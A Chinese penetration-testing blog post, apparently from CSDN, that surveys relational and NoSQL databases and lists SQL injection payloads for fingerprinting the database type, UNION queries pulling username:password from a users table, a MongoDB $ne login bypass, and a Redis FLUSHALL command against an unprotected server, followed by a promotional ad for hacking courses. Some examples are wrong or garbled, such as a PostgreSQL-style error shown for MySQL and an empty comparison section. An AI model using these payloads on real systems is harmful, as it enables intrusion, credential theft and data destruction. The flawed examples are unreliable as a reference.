数据库类型以及判断方法(渗透测试篇)
有小伙伴私信说想了解一些关于数据方面的知识,在测试时如果发现问题,如何判断数据库类型,从而进一步渗透测试(红队方向)
数据库类型
数据库共有2种类型:关系型数据库、非关系型数据库 。
1、关系数据库
MySQL、MariaDB(MySQL的代替品)、
Percona Server(MySQL的代替品·)、PostgreSQL、
Microsoft Access、Google Fusion Tables、SQLite、DB2、FileMaker、Oracle、SQL Server、INFORMIX、Sybase、dBASE、Clipper、FoxPro、foshub。
几乎所有的数据库管理系统都配备了一个开放式数据库连接(ODBC)驱动程序,令各个数据库之间得以互相集成。
延申:
如果发现了注入点(sql注入)如何判断是哪种数据库,在这里列举常用的几种数据库
(1)通过错误信息识别
MySQL:
’ AND 1=cast(version() as int)–
报错会包含类似 "ERROR: invalid input syntax for integer: '5.7.32'",显示MySQL版本。
PostgreSQL:
’ AND 1=cast(version() as int)–
报错提示 "invalid input syntax for integer: PostgreSQL X.Y.Z ..."。
Oracle:
’ AND 1=to_number(version)–
报错可能显示 "ORA-00904: invalid identifier",但通过其他方式可暴露版本。
SQL Server:
sql’ AND 1=convert(int,@@version)–
报错信息会包含 "Microsoft SQL Server XXXX"。
(2)特定函数测试
MySQL:
' AND sleep(5)-- -- 成功延迟则为MySQL ' SELECT @@version -- 返回版本信息
PostgreSQL:
' AND pg_sleep(5)-- -- 延迟生效则为PostgreSQL ' SELECT version() -- 返回详细版本信息
Oracle:
'AND(SELECTutl_inaddr.get_host_name(‘127.0.0.1’) FROM dual) IS NOT NULL–
若存在 UTL_INADDR 权限,可能暴露Oracle。
SQL Server:
' WAITFOR DELAY '0:0:5'-- -- 延迟5秒则为SQL Server ' SELECT @@version -- 返回版本信息
(3)系统表查询
MySQL:
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
PostgreSQL:
' AND (SELECT COUNT(*) FROM pg_catalog.pg_tables) > 0--
Oracle:
' AND (SELECT COUNT(*) FROM all_tables) > 0--
SQL Server:
' AND (SELECT COUNT(*) FROM sys.databases) > 0--
不同数据库的注入语句也存在差异
(1)字符串拼接
MySQL:
' UNION SELECT CONCAT(username, ':', password) FROM users--
Oracle:
' UNION SELECT username || ':' || password FROM users--
SQL Server:
' UNION SELECT username + ':' + password FROM users--
(2)注释符号
MySQL/PostgreSQL:
' OR 1=1 --
Oracle:
' OR 1=1 --
SQL Server:
' OR 1=1 --
(3)时间盲注
MySQL:
' AND IF(1=1, SLEEP(5), 0)--
PostgreSQL:
' AND CASE WHEN 1=1 THEN pg_sleep(5) ELSE NULL END--
SQL Server:
‘IF 1=1 WAITFOR DELAY ‘0:0:5’–
(4)联合查询的列数填充
MySQL:
' UNION SELECT NULL, NULL, NULL--
Oracle:
' UNION SELECT NULL, NULL, NULL FROM dual--
包括自动化工具sqlmap也可以实现
2、非关系型数据库(NoSQL)
redis、MongoDB、Memcache、HBase、BigTable、Cassandra、CouchDB、Neo4J。
延伸:同样非关系型数据库运用场景
(1)文档型数据库
典型代表:MongoDB、CouchDB
特点:数据以类似JSON的文档格式存储(如BSON),支持嵌套结构。
查询方式:通过类JSON语法或API(如MongoDB的find({age: {$gt: 18}}))。
(2) 键值型数据库
典型代表:Redis、Memcached
特点:数据以键值对形式存储,适合高速缓存和简单查询。
查询方式:通过键直接读写,如GET user:1234。
(3) 宽列存储数据库
典型代表:Cassandra、HBase
特点:数据按列族(Column Family)存储,适合海量数据分布式处理。
查询方式:通过行键(Row Key)和列名定位数据。
(4)图数据库
典型代表:Neo4j、ArangoDB
特点:以图结构存储实体(节点)和关系(边),适合复杂关系分析。
查询方式:图遍历查询语言(如Cypher)。
NoSQL数据库的常见安全问题
NoSQL注入:
利用查询语法逻辑漏洞,例如MongoDB的操作符注入:
// 原始查询:db.users.find({user: "$user", pass: "$pass"})// 攻击载荷:user=admin&pass[$ne]=1// 实际查询:db.users.find({user: "admin", pass: {$ne: 1}})
这会返回所有密码不等于1的用户(可能绕过认证)。
未授权访问:
案例:Redis未设置密码且绑定在公网IP,导致攻击者直接连接并执行命令:
redis-cli -h 目标IP FLUSHALL # 清空所有数据
不安全的默认配置:
MongoDB默认无需身份验证,且早期版本监听所有接口(0.0.0.0)。
数据序列化漏洞:
例如,Redis的CONFIG SET命令可修改持久化路径,写入恶意文件。
NoSQL与关系型数据库的核心区别
| 特性 | 关系型数据库(如MySQL) | 非关系型数据库(如MongoDB) |
|---|---|---|
| 数据结构 | 严格表结构,行和列固定 | 灵活文档/键值/图结构,无固定模式 |
| 查询语言 | SQL(结构化查询语言) | 特定API或类JSON查询语法 |
| 扩展性 | 垂直扩展为主(增强单机性能) | 水平扩展为主(分布式架构) |
| 事务支持 | ACID事务(强一致性) | 部分支持(如MongoDB的副本集事务) |
| 典型场景 | 复杂事务处理(如银行系统) | 高并发、大数据量(如日志、社交网络) |
优点:
1、易于维护:都是使用表结构,格式一致;
2、使用方便:SQL语言通用,可用于复杂查询;
3、复杂操作:支持SQL,可用于一个表以及多个表之间非常复杂的查询。
缺点:
1、读写性能比较差,尤其是海量数据的高效率读写;
2、固定的表结构,灵活度稍欠;
3、高并发读写需求,传统关系型数据库来说,硬盘I/O是一个很大的瓶颈。
非关系型数据库严格上不是一种数据库,应该是一种数据结构化存储方法的集合,可以是文档或者键值对等。
优点:
1、格式灵活:存储数据的格式可以是key,value形式、文档形式、图片形式等等,文档形式、图片形式等等,使用灵活,应用场景广泛,而关系型数据库则只支持基础类型。
2、速度快:nosql可以使用硬盘或者随机存储器作为载体,而关系型数据库只能使用硬盘;
3、高扩展性;
4、成本低:nosql数据库部署简单,基本都是开源软件。
缺点:
1、不提供sql支持,学习和使用成本较高;
2、无事务处理;
3、数据结构相对复杂,复杂查询方面稍欠。
非关系型数据库的分类和比较:
1、key-value型 (针对高性能并发读写场景)
2、文档型 (针对海量数据访问场景)
3、列式数据库
4、图形数据库
三、每个数据库的区别:
mysql:
oracle:
sql server:
informix:
redis: (非关系型数据库----键值数据库)
MongoDB:(非关系型数据库----文档数据库)
HBase:(非关系型数据库----列存储数据库)
Neo4J : (非关系型数据库----图形数据库)
{补充: 数据库模型:对象模型、层次模型(轻量级数据访问协议)、网状模型(大型数据储存)、关系模型、面向对象模型、半结构化模型、平面模型(表格模型,一般在形式上是一个二维数组。如表格模型数据Excel)。}
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。

L1级别:网络安全的基础入门
L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。

L2级别:网络安全的技术进阶
L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。

L3级别:网络安全的高阶提升
L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。

L4级别:网络安全的项目实战
L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题

整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。
二、技术文档和经典PDF书籍
书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)

三、网络安全视频教程
对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识。
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

四、网络安全护网行动/CTF比赛
学以致用 ,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。

五、网络安全工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

面试不仅是技术的较量,更需要充分的准备。
在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。
如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…


**读者福利 |** CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
扫一扫
7808
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
